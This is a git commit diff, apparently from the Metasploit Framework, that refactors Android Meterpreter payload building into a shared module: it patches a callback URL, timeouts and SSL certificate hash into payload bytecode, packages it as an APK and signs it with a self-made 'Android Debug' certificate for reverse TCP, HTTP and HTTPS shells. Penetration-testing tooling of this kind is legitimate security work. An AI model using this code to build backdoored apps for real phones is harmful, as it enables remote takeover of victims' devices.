refactor into android.rb

timwr · timwr · commit b4a1adaf0f6a · 2016-09-28T18:23:34.000+08:00
diff --git a/lib/msf/core/payload/android.rb b/lib/msf/core/payload/android.rb
@@ -36,7 +36,7 @@ def java_string(str)
     [str.length].pack("N") + str
   end
 
-  def apply_options(classes, opts, url)
+  def apply_options(classes, opts)
     timeouts = [
       datastore['SessionExpirationTimeout'].to_s,
       datastore['SessionCommunicationTimeout'].to_s,
@@ -47,7 +47,15 @@ def apply_options(classes, opts, url)
       config = generate_config_hex(opts)
       string_sub(classes, 'UUUU' + ' ' * 8191, 'UUUU' + config)
     end
-    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
+    if opts[:ssl]
+      verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
+                                           datastore['HandlerSSLCert'])
+      if verify_cert_hash
+        hash = 'WWWW' + verify_cert_hash.unpack("H*").first
+        string_sub(classes, 'WWWW                                        ', hash)
+      end
+    end
+    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + payload_uri)
     string_sub(classes, 'TTTT' + ' ' * 48, 'TTTT' + timeouts)
   end
 
@@ -70,11 +78,11 @@ def string_sub(data, placeholder="", input="")
     data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
   end
 
-  def generate_cert
+  def sign_jar(jar)
     x509_name = OpenSSL::X509::Name.parse(
-      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
-      )
-    key  = OpenSSL::PKey::RSA.new(1024)
+      "C=US/O=Android/CN=Android Debug"
+    )
+    key  = OpenSSL::PKey::RSA.new(2048)
     cert = OpenSSL::X509::Certificate.new
     cert.version = 2
     cert.serial = 1
@@ -99,7 +107,32 @@ def generate_cert
     # If this line is left out, signature verification fails on OSX.
     cert.sign(key, OpenSSL::Digest::SHA1.new)
 
-    return cert, key
+    jar.sign(key, cert, [cert])
   end
+
+  def generate_jar(opts={})
+    if opts[:stageless]
+      classes = MetasploitPayloads.read('android', 'meterpreter.dex')
+    else
+      classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
+    end
+
+    apply_options(classes, opts)
+
+    jar = Rex::Zip::Jar.new
+    files = [
+      [ "AndroidManifest.xml" ],
+      [ "resources.arsc" ]
+    ]
+    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
+    jar.add_file("classes.dex", fix_dex_header(classes))
+    jar.build_manifest
+
+    sign_jar(jar)
+
+    jar
+  end
+
+
 end
 
diff --git a/modules/payloads/singles/android/meterpreter_reverse_http.rb b/modules/payloads/singles/android/meterpreter_reverse_http.rb
@@ -48,6 +48,11 @@ def transport_config(opts={})
   end
 
   def generate_jar(opts={})
+    opts[:stageless] = true
+    super(opts)
+  end
+
+  def payload_uri(req=nil)
     # Default URL length is 30-256 bytes
     uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
     # Generate the short default URL if we don't know available space
@@ -59,23 +64,7 @@ def generate_jar(opts={})
     # TODO: perhaps wire in an existing UUID from opts?
     url << generate_uri_uuid_mode(:init_connect, uri_req_len)
 
-    classes = MetasploitPayloads.read('android', 'meterpreter.dex')
-    opts[:stageless] = true
-    apply_options(classes, opts, url)
-
-    jar = Rex::Zip::Jar.new
-    jar.add_file("classes.dex", fix_dex_header(classes))
-    files = [
-      [ "AndroidManifest.xml" ],
-      [ "resources.arsc" ]
-    ]
-    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
-    jar.build_manifest
-
-    cert, key = generate_cert
-    jar.sign(key, cert, [cert])
-
-    jar
+    url
   end
 
 end
diff --git a/modules/payloads/singles/android/meterpreter_reverse_tcp.rb b/modules/payloads/singles/android/meterpreter_reverse_tcp.rb
@@ -42,25 +42,8 @@ def transport_config(opts={})
   end
 
   def generate_jar(opts={})
-    jar = Rex::Zip::Jar.new
-    classes = MetasploitPayloads.read('android', 'meterpreter.dex')
-    url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
     opts[:stageless] = true
-    apply_options(classes, opts, url)
-
-    jar.add_file("classes.dex", fix_dex_header(classes))
-    files = [
-      [ "AndroidManifest.xml" ],
-      [ "resources.arsc" ]
-    ]
-    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
-    jar.build_manifest
-
-    cert, key = generate_cert
-    jar.sign(key, cert, [cert])
-
-    jar
+    super(opts)
   end
 
-
 end
diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb
@@ -28,7 +28,14 @@ def initialize(info = {})
     ))
   end
 
-  def generate_jar(opts={})
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_http(opts)
+  end
+
+  def payload_uri(req=nil)
     # Default URL length is 30-256 bytes
     uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
     # Generate the short default URL if we don't know available space
@@ -40,22 +47,7 @@ def generate_jar(opts={})
     # TODO: perhaps wire in an existing UUID from opts?
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
-    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    apply_options(classes, opts, url)
-
-    jar = Rex::Zip::Jar.new
-    jar.add_file("classes.dex", fix_dex_header(classes))
-    files = [
-      [ "AndroidManifest.xml" ],
-      [ "resources.arsc" ]
-    ]
-    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
-    jar.build_manifest
-
-    cert, key = generate_cert
-    jar.sign(key, cert, [cert])
-
-    jar
+    url
   end
 
 end
diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb
@@ -29,8 +29,13 @@ def initialize(info = {})
   end
 
   def generate_jar(opts={})
+    opts[:ssl] = true
+    super(opts)
+  end
+
+  def payload_uri(req=nil)
     # Default URL length is 30-256 bytes
-    uri_req_len = 30 + rand(256-30)
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
     # Generate the short default URL if we don't know available space
     if self.available_space.nil?
       uri_req_len = 5
@@ -40,29 +45,8 @@ def generate_jar(opts={})
     # TODO: perhaps wire in an existing UUID from opts?
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
-    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-
-    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
-                                         datastore['HandlerSSLCert'])
-    if verify_cert_hash
-        hash = 'WWWW' + verify_cert_hash.unpack("H*").first
-        string_sub(classes, 'WWWW                                        ', hash)
-    end
-
-    apply_options(classes, opts, url)
-
-    jar = Rex::Zip::Jar.new
-    jar.add_file("classes.dex", fix_dex_header(classes))
-    files = [
-      [ "AndroidManifest.xml" ],
-      [ "resources.arsc" ]
-    ]
-    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
-    jar.build_manifest
+    url
+  end
 
-    cert, key = generate_cert
-    jar.sign(key, cert, [cert])
 
-    jar
-  end
 end
diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -39,26 +39,4 @@ def transport_config(opts={})
     transport_config_reverse_tcp(opts)
   end
 
-  def generate_jar(opts={})
-    jar = Rex::Zip::Jar.new
-
-    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    apply_options(classes, opts, payload_uri)
-
-    jar.add_file("classes.dex", fix_dex_header(classes))
-
-    files = [
-      [ "AndroidManifest.xml" ],
-      [ "resources.arsc" ]
-    ]
-
-    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
-    jar.build_manifest
-
-    cert, key = generate_cert
-    jar.sign(key, cert, [cert])
-
-    jar
-  end
-
 end
